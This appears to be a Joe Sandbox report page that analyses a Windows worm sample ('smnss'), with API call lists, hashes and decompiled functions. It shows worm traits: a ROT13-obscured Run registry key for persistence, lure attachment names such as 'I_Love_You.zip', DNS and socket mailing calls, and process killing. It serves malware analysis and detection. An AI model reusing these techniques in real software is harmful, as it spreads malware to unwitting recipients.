Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$CloseCreateDirectoryExitFileHandleProcessSystemlstrlenmemset
String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Eha$pgszra.rkr$user32.dll
API String ID: 1778546552-2563098034
Opcode ID: 74071c8a4e3613b750008268494174c79e934ec9dc8cd3874d7da89e717f8aea
Instruction ID: 8ce02ae271826c0af2d77be6dc83fb0dca404b62b159729ddab96385648218ed
Opcode Fuzzy Hash: 74071c8a4e3613b750008268494174c79e934ec9dc8cd3874d7da89e717f8aea
Instruction Fuzzy Hash: F3212AB08097049AD710BF21C58538EBBF4AF84358F41897EE9C867281D7BD858C8F96

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE8 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 119memorystringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00405F28
GetProcessHeap.KERNEL32 ref: 00405F38

Part of subcall function 00409250: malloc.MSVCRT ref: 004092A3

Part of subcall function 004060AA: DnsQuery_A.DNSAPI ref: 004060E7
Part of subcall function 004060AA: GetProcessHeap.KERNEL32 ref: 0040610A
Part of subcall function 004060AA: RtlAllocateHeap.NTDLL ref: 00406122
Part of subcall function 004060AA: lstrcpy.KERNEL32 ref: 00406144
Part of subcall function 004060AA: GlobalFree.KERNEL32 ref: 00406182

GetProcessHeap.KERNEL32 ref: 00406049
HeapFree.KERNEL32 ref: 00406060

Part of subcall function 0040619A: memset.MSVCRT ref: 004061C4
Part of subcall function 0040619A: GetSystemTime.KERNEL32 ref: 00406249
Part of subcall function 0040619A: wsprintfA.USER32 ref: 004062BD
Part of subcall function 0040619A: socket.WS2_32 ref: 004062D9
Part of subcall function 0040619A: htons.WS2_32 ref: 004062F9
Part of subcall function 0040619A: inet_addr.WS2_32 ref: 0040630B
Part of subcall function 0040619A: gethostbyname.WS2_32 ref: 00406321
Part of subcall function 0040619A: connect.WS2_32 ref: 0040634D

Strings

@, xrefs: 00405F1A
j_@, xrefs: 00405FD2

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Heap$Process$Free$AllocateGlobalQuery_SystemTimeconnectgethostbynamehtonsinet_addrlstrcpymallocmemsetsocketstrchrwsprintf
String ID: @$j_@
API String ID: 3179556216-3208567232
Opcode ID: fc9346dcb6b12ca964b5fee82d416c20218d364c213d814c77fce05a4a95092c
Instruction ID: 173fe34617f367652bf3f1e9fca4c53672752cc9009160b2f8c90af088e1383c
Opcode Fuzzy Hash: fc9346dcb6b12ca964b5fee82d416c20218d364c213d814c77fce05a4a95092c
Instruction Fuzzy Hash: 7551B4B4904709DFCB10DFA5C48468EBBF1FF88314F14862AE868A7395D3389846CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9D0 Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0040AA3D
SetLastError.KERNEL32 ref: 0040AA4F

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ErrorLastValue
String ID:
API String ID: 1151882462-0
Opcode ID: 49d06252631d2c5c8c2d25fde44a13d536e716d3c70b2a77a029649fafb08e20
Instruction ID: 444a06ef6d56dde007bbc20e4d8b26003c34dd805877e33333d77d24524e80d9
Opcode Fuzzy Hash: 49d06252631d2c5c8c2d25fde44a13d536e716d3c70b2a77a029649fafb08e20
Instruction Fuzzy Hash: 88513A70E003088FDB10EFA9DA8469EBBF4BB04304F14853AD845B7390DB78A955CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB20 Relevance: 9.1, APIs: 6, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040BB20(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v40;
				intOrPtr _v52;
				long _v56;
				void* _v60;
				intOrPtr _v84;
				intOrPtr _v96;
				void* _t54;
				long _t56;
				void* _t57;
				void* _t58;
				void* _t60;
				void* _t62;
				long _t65;
				void* _t66;
				void* _t67;
				intOrPtr* _t70;
				void* _t72;
				void* _t78;
				void* _t82;
				void* _t88;
				void* _t94;
				intOrPtr _t101;
				long _t113;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t119;
				intOrPtr* _t120;
				long* _t121;
				void** _t122;
				long* _t123;
				intOrPtr* _t124;

				_t87 = __ebx;
				_push(__ebx);
				_t120 = _t119 - 0x1c;
				_t54 =  *0x418284;
				_t109 = _a4;
				if(_t54 == 0) {
					E0040B0E0(_t54);
					_t54 =  *0x418284;
					_t113 =  *(_t54 + 0x30);
					if(_t113 >= 0) {
						goto L2;
					} else {
						goto L15;
					}
					goto L47;
				} else {
					_t113 =  *(_t54 + 0x30);
					if(_t113 < 0) {
						L15:
						E0040B3B0(_t87, _t113);
						_t54 =  *0x418284;
						_t88 =  *(_t54 + 0x30);
						if(_t88 == 0) {
							goto L3;
						} else {
							goto L17;
						}
						L47:
					} else {
						L2:
						_t88 =  *(_t54 + 0x30);
						if(_t88 != 0) {
							L17:
							_t56 = GetLastError();
							 *_t120 =  *((intOrPtr*)(_t54 + 0x2c));
							_t113 = _t56;
							_t57 = TlsGetValue(??);
							_t121 = _t120 - 4;
							_t88 = _t57;
							 *_t121 = _t113;
							SetLastError(??);
							_t58 = _t88;
							_t120 = _t121 - 4;
						} else {
							L3:
							_t58 =  *(_t54 + 0x28);
						}
					}
				}
				_v20 = _t58;
				_v24 = _t58;
				if( *((intOrPtr*)(_t109 + 0xc)) != 0) {
					_t60 = E0040B8D0(_t109,  &_v24);
				} else {
					_t60 = E0040B6B0(_t109,  &_v24);
				}
				if(_t60 == 7) {
					_t78 =  *0x418284;
					_t88 = _v24;
					if(_t78 == 0) {
						E0040B0E0(_t78);
						_t78 =  *0x418284;
						if( *((intOrPtr*)(_t78 + 0x30)) >= 0) {
							L9:
							_t109 =  *((intOrPtr*)(_t78 + 0x30));
							if( *((intOrPtr*)(_t78 + 0x30)) != 0) {
								_v40 = _t88;
								 *_t120 =  *((intOrPtr*)(_t78 + 0x2c));
								if(TlsSetValue(??, ??) == 0) {
									GetLastError();
								}
							} else {
								 *(_t78 + 0x28) = _t88;
							}
							_t82 = _v24;
							_t116 =  *((intOrPtr*)(_t82 + 0x20));
							_t120 =  *((intOrPtr*)(_t82 + 0x28));
							goto __ecx;
						}
						L22:
						E0040B3B0(_t88, _t113);
						_t78 =  *0x418284;
						goto L9;
					}
					if( *((intOrPtr*)(_t78 + 0x30)) < 0) {
						goto L22;
					}
					goto L9;
				}
				abort();
				_push(_t116);
				_t117 = _t120;
				_t122 = _t120 - 0x28;
				_v52 = _t109;
				_t110 = _v40;
				_v60 = _t88;
				_v56 = _t113;
				_t114 =  *(_t110 + 0xc);
				if( *(_t110 + 0xc) == 0) {
					 *_t122 = _t110;
					return E0040B740();
				} else {
					_t62 =  *0x418284;
					if(_t62 == 0) {
						E0040B0E0(_t62);
						_t62 =  *0x418284;
					}
					_t91 =  *((intOrPtr*)(_t62 + 0x30));
					if( *((intOrPtr*)(_t62 + 0x30)) < 0) {
						E0040B3B0(_t91, _t114);
						_t62 =  *0x418284;
					}
					if( *((intOrPtr*)(_t62 + 0x30)) != 0) {
						_t65 = GetLastError();
						 *_t122 =  *(_t62 + 0x2c);
						_t114 = _t65;
						_t66 = TlsGetValue(??);
						_t123 = _t122 - 4;
						 *_t123 = _t65;
						SetLastError(??);
						_t67 = _t66;
						_t122 = _t123 - 4;
					} else {
						_t67 =  *(_t62 + 0x28);
					}
					_v24 = _t67;
					_v28 = _t67;
					if(E0040B8D0(_t110,  &_v28) == 7) {
						_t72 =  *0x418284;
						_t94 = _v28;
						if(_t72 == 0) {
							E0040B0E0(_t72);
							_t72 =  *0x418284;
						}
						if( *(_t72 + 0x30) < 0) {
							E0040B3B0(_t94, _t114);
							_t72 =  *0x418284;
						}
						_t110 =  *(_t72 + 0x30);
						if( *(_t72 + 0x30) != 0) {
							_v84 = _t94;
							 *_t122 =  *(_t72 + 0x2c);
							if(TlsSetValue(??, ??) == 0) {
								GetLastError();
							}
						} else {
							 *((intOrPtr*)(_t72 + 0x28)) = _t94;
						}
						_t62 = _v28;
						_t117 =  *((intOrPtr*)(_t62 + 0x20));
						_t122 =  *(_t62 + 0x28);
						goto __ecx;
					}
					abort();
					_push(_t117);
					_t124 = _t122 - 8;
					_t101 = _v84;
					_t70 =  *((intOrPtr*)(_t101 + 8));
					if(_t70 != 0) {
						_v96 = _t101;
						 *_t124 = 1;
						return  *_t70();
					} else {
						return _t70;
					}
				}
				goto L47;
			}

APIs

GetLastError.KERNEL32(?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BBF3
TlsGetValue.KERNEL32(?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BBFE
SetLastError.KERNEL32(?,?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BC0C

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: fa13b5d1df785b275ee1be112967064b6d69b0b989222e142ff9d8512929a6cc
Instruction ID: 70379029d47ec5d74f210fe91046701c6fe62c7a006fd99b0e016d118132c0f1
Opcode Fuzzy Hash: fa13b5d1df785b275ee1be112967064b6d69b0b989222e142ff9d8512929a6cc
Instruction Fuzzy Hash: A1315B70A0061A8FCB50EF65CA84A5ABBB4FB44300B0585BED904AB796DB34FD05CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00401000(intOrPtr __ebx, intOrPtr __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v24;
				intOrPtr* _t16;
				intOrPtr* _t27;
				intOrPtr* _t33;
				intOrPtr* _t37;

				_v12 = __ebx;
				_t27 = 0;
				_v8 = __esi;
				_t33 = 0;
				_t16 =  *((intOrPtr*)( *_a4));
				if(_t16 > 0xc0000091) {
					__eflags = _t16 - 0xc0000094;
					if(__eflags == 0) {
						goto L3;
					} else {
						if(__eflags > 0) {
							__eflags = _t16 - 0xc0000096;
							goto L14;
						} else {
							__eflags = _t16 - 0xc0000093;
							if(_t16 == 0xc0000093) {
								goto L2;
							} else {
								return 0;
							}
						}
					}
				} else {
					if(_t16 < 0xc000008d) {
						__eflags = _t16 - 0xc0000005;
						if(_t16 == 0xc0000005) {
							 *_t37 = 0xb;
							_v24 = 0;
							L0040C198();
							__eflags = 0 - 1;
							if(0 == 1) {
								 *_t37 = 0xb;
								_v24 = 1;
								L0040C198();
								goto L6;
							} else {
								__eflags = 0;
								if(0 != 0) {
									 *_t37 = 0xb;
									 *0x00000000();
									goto L6;
								}
							}
						} else {
							__eflags = _t16 - 0xc000001d;
							L14:
							if(__eflags == 0) {
								 *_t37 = 4;
								_v24 = 0;
								L0040C198();
								__eflags = _t16 - 1;
								if(_t16 == 1) {
									 *_t37 = 4;
									_v24 = 1;
									L0040C198();
									goto L6;
								} else {
									__eflags = _t16;
									if(_t16 != 0) {
										 *_t37 = 4;
										 *_t16();
										goto L6;
									}
								}
							}
						}
					} else {
						L2:
						_t33 = 1;
						L3:
						 *_t37 = 8;
						_v24 = 0;
						L0040C198();
						if(_t16 == 1) {
							 *_t37 = 8;
							_v24 = 1;
							L0040C198();
							__eflags = _t33;
							if(_t33 != 0) {
								E0040B000(1);
							}
							goto L6;
						} else {
							if(_t16 != 0) {
								 *_t37 = 8;
								 *_t16();
								L6:
								_t27 = 0xffffffff;
							}
						}
					}
					return _t27;
				}
			}

APIs

signal.MSVCRT ref: 00401037
signal.MSVCRT ref: 0040109B
signal.MSVCRT ref: 004010CB

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 9dd3622f94295c007e8091df12e6935fb1746a3fe3b08565decb20ecfd99f9c6
Instruction ID: 6d904beb62735350cc8560cdbfd164d6d9336f8a3c982fff81a65fa89f770588
Opcode Fuzzy Hash: 9dd3622f94295c007e8091df12e6935fb1746a3fe3b08565decb20ecfd99f9c6
Instruction Fuzzy Hash: BC3125709042449BE720AF69C58032EB6E0BB49314F15893FD9C5EB7E2C67E8DC09B4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC80 Relevance: 9.1, APIs: 6, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E0040BC80(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v40;
				intOrPtr _v52;
				void* _t31;
				long _t34;
				void* _t35;
				void* _t36;
				intOrPtr* _t39;
				void* _t41;
				void* _t52;
				intOrPtr _t56;
				intOrPtr _t65;
				intOrPtr* _t67;
				long* _t68;
				intOrPtr* _t69;

				_v8 = __edi;
				_t60 = _a4;
				_v16 = __ebx;
				_v12 = __esi;
				_t63 =  *(_t60 + 0xc);
				if( *(_t60 + 0xc) == 0) {
					 *_t67 = _t60;
					return E0040B740();
				} else {
					_t31 =  *0x418284;
					if(_t31 == 0) {
						E0040B0E0(_t31);
						_t31 =  *0x418284;
					}
					_t49 =  *((intOrPtr*)(_t31 + 0x30));
					if( *((intOrPtr*)(_t31 + 0x30)) < 0) {
						E0040B3B0(_t49, _t63);
						_t31 =  *0x418284;
					}
					if( *((intOrPtr*)(_t31 + 0x30)) != 0) {
						_t34 = GetLastError();
						 *_t67 =  *((intOrPtr*)(_t31 + 0x2c));
						_t63 = _t34;
						_t35 = TlsGetValue(??);
						_t68 = _t67 - 4;
						 *_t68 = _t34;
						SetLastError(??);
						_t36 = _t35;
						_t67 = _t68 - 4;
					} else {
						_t36 =  *(_t31 + 0x28);
					}
					_v20 = _t36;
					_v24 = _t36;
					if(E0040B8D0(_t60,  &_v24) == 7) {
						_t41 =  *0x418284;
						_t52 = _v24;
						if(_t41 == 0) {
							E0040B0E0(_t41);
							_t41 =  *0x418284;
						}
						if( *((intOrPtr*)(_t41 + 0x30)) < 0) {
							E0040B3B0(_t52, _t63);
							_t41 =  *0x418284;
						}
						_t60 =  *((intOrPtr*)(_t41 + 0x30));
						if( *((intOrPtr*)(_t41 + 0x30)) != 0) {
							_v40 = _t52;
							 *_t67 =  *((intOrPtr*)(_t41 + 0x2c));
							if(TlsSetValue(??, ??) == 0) {
								GetLastError();
							}
						} else {
							 *((intOrPtr*)(_t41 + 0x28)) = _t52;
						}
						_t31 = _v24;
						_t65 =  *((intOrPtr*)(_t31 + 0x20));
						_t67 =  *((intOrPtr*)(_t31 + 0x28));
						goto __ecx;
					}
					abort();
					_push(_t65);
					_t69 = _t67 - 8;
					_t56 = _v40;
					_t39 =  *((intOrPtr*)(_t56 + 8));
					if(_t39 != 0) {
						_v52 = _t56;
						 *_t69 = 1;
						return  *_t39();
					} else {
						return _t39;
					}
				}
			}

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0040A5BE,?,?,?,?,?,0040920F), ref: 0040BD2A
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,0040A5BE,?,?,?,?,?,0040920F), ref: 0040BD35
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD43
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD5D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD6A
abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD9F

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ErrorLast$Value$abort
String ID:
API String ID: 2626461348-0
Opcode ID: d44fb8144051525f46a2ddd0a77b2159513e5a59cadc495b3667b9b5871e9868
Instruction ID: 54ad4b7b80f31364e908b692a5ee0ad386bd410343df76c18df6e0f8c4ff5425
Opcode Fuzzy Hash: d44fb8144051525f46a2ddd0a77b2159513e5a59cadc495b3667b9b5871e9868
Instruction Fuzzy Hash: A0312A70A04609CFDB40EF65D680AAAB7B4FF48300B1585BED855AB391DB34AD01CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0040435C Relevance: 9.1, APIs: 6, Instructions: 71filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
GetFileTime.KERNEL32 ref: 004043CD
CloseHandle.KERNEL32 ref: 004043E5
CreateFileA.KERNEL32 ref: 00404423
SetFileTime.KERNEL32 ref: 00404453
CloseHandle.KERNEL32 ref: 00404467

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 6ae7f4e56724e33a2a17575310c9cca5a702e644e45d336fa09f717b1ac5613f
Instruction ID: 821c52c15d2594163c2509e09139001ce0ed311c0e70272f4ce7e626a9184330
Opcode Fuzzy Hash: 6ae7f4e56724e33a2a17575310c9cca5a702e644e45d336fa09f717b1ac5613f
Instruction Fuzzy Hash: B0210AB09083019BE700EF39C59535BBFE4AB84358F008A3DE994973D2E779C648CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00402A73 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 64stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402A87

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402AAF
lstrcat.KERNEL32 ref: 00402AD1
lstrcat.KERNEL32 ref: 00402AEB
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402B10

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Strings

Happy_birthday_to_you.zip, xrefs: 00402B05

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID: Happy_birthday_to_you.zip
API String ID: 1562643418-1870604427
Opcode ID: 444f3cb21bfd082fe6ff21f2be50a688dd714ba8539f5d8e29ecb1546971eae2
Instruction ID: cc83420afc5f1d077a3f5b7fbaa549a80263fd77f6117133aa0d2265757cdded
Opcode Fuzzy Hash: 444f3cb21bfd082fe6ff21f2be50a688dd714ba8539f5d8e29ecb1546971eae2
Instruction Fuzzy Hash: 3C21FF759043048BC710EF64D98169EBBF0EF84314F40897FE584A7341EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 004029C9 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 64stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 004029DD

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402A05
lstrcat.KERNEL32 ref: 00402A27
lstrcat.KERNEL32 ref: 00402A41
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402A66

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Strings

I_Love_You.zip, xrefs: 00402A5B

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID: I_Love_You.zip
API String ID: 1562643418-69349870
Opcode ID: 272eccd8abf1a84982a6af5fa66f18c31c99625c96ed113c25d47f323b18ee03
Instruction ID: f9bbb920bae34a53852b7a8ae3bd8492a159d249183d5996932f43f3eb41e795
Opcode Fuzzy Hash: 272eccd8abf1a84982a6af5fa66f18c31c99625c96ed113c25d47f323b18ee03
Instruction Fuzzy Hash: 3A21DF759043048BCB11EF64D98169EBBF4EF84314F40897FE585A7381EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00401B7E Relevance: 9.1, APIs: 6, Instructions: 54fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00401B93
fopen.MSVCRT ref: 00401BA8
realloc.MSVCRT ref: 00401BCF
fread.MSVCRT ref: 00401BF5
??3@YAXPAX@Z.MSVCRT ref: 00401C14
fclose.MSVCRT ref: 00401C1C

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ??3@fclosefopenfreadmallocrealloc
String ID:
API String ID: 418953348-0
Opcode ID: 6e75ed8879061208f88e70ec4680b78b20488749353ea0872ea9de9d7e433587
Instruction ID: 75d7d26d9218dbdf86978dcb23e5f4fbbd0c24693f44c664e0b05ab087c45b19
Opcode Fuzzy Hash: 6e75ed8879061208f88e70ec4680b78b20488749353ea0872ea9de9d7e433587
Instruction Fuzzy Hash: 6E115A705087049BD300AF2AC4C475EFAE4EF44358F05893EE8C8AB3D2E77D98458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404D3A Relevance: 9.1, APIs: 6, Instructions: 51processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00404D58
Process32First.KERNEL32 ref: 00404D79
strcmp.MSVCRT ref: 00404D92
OpenProcess.KERNEL32 ref: 00404DB4
TerminateProcess.KERNEL32 ref: 00404DCB
Process32Next.KERNEL32 ref: 00404DE0

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: ProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32strcmp
String ID:
API String ID: 3031566330-0
Opcode ID: 2f2f5fe6758f399921e03acf2909baea6f39b8887e69680e0eb8b402d680a7dd
Instruction ID: 382b25c2ad7d0cef6f391bcc669a6196322adae5fe9b19759f67a92d9b3667d2
Opcode Fuzzy Hash: 2f2f5fe6758f399921e03acf2909baea6f39b8887e69680e0eb8b402d680a7dd
Instruction Fuzzy Hash: 4E1133B18043049AD710BF35D98539EBBF8AF84754F00857EED88A3281E7789958CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040B040 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetAtomNameA.KERNEL32 ref: 0040B05F

Part of subcall function 0040C130: fprintf.MSVCRT ref: 0040C15D
Part of subcall function 0040C130: fflush.MSVCRT ref: 0040C16D
